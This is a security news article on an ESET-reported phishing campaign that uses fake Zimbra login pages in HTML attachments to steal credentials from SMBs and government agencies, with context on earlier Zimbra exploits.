A new phishing campaign is targeting small and medium-sized businesses and government agencies in several countries that use the Zimbra Collaboration platform, aiming to gather credentials for use in potential further operations.
The campaign has been ongoing since at least April and, unlike some previous campaigns targeting Zimbra products, this one mainly relies on social engineering and does not exploit a vulnerability. Researchers at ESET discovered the campaign and have not been able to attribute it to any known attack group. Many of the known targeted organizations are in Poland, with others located in Italy, Ecuador, Russia, and elsewhere.
Zimbra Collaboration is a platform that includes email, calendar, and other functionality, and is popular with SMBs and small government agencies. The campaign that the ESET researchers uncovered begins like most phishing operations: with a malicious email attachment.
“Initially, the target receives an email with a phishing page in the attached HTML file. The email warns the target about an email server update, account deactivation, or similar issue and directs the user to click on the attached file. The adversary also spoofs the From: field of the email to appear to be an email server administrator,” the ESET researchers said.
“After opening the attachment, the user is presented with a fake Zimbra login page customized according to the targeted organization. The HTML file is opened in the victim’s browser, which might trick the victim into believing they were directed to the legitimate login page, even though the URL points to a local file path. Note that the Username field is prefilled in the login form, which makes it appear more legitimate.”
If the victim enters the credentials for the Zimbra Collaboration account, they’re then collected and sent to a remote server. In some cases, the researchers saw the attackers sending phishing emails from organizations that had been targeted previously. That likely means that the attackers stole admin credentials and were then able to spin up new mailboxes to send the phishing messages, which is a common tactic in these campaigns.
In the last few months there have been other campaigns targeting Zimbra products. In March, Proofpoint researchers identified a group known as Winter Vivern that was running a phishing campaign that included an exploit for a vulnerability (CVE-2022-27926) in Zimbra Collaboration. In July 2022, Google researchers warned of a zero day in Collaboration that was being actively exploited, and three months later, another zero day emerged in the same product.
This recent campaign doesn’t include any exploitation of vulnerabilities, as far as the ESET researchers could see, but it was still effective.
“Despite this campaign not being so technically sophisticated, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration, which remains an attractive target for adversaries. Adversaries leverage the fact that HTML attachments contain legitimate code, and the only telltale element is a link pointing to the malicious host,” the researchers said.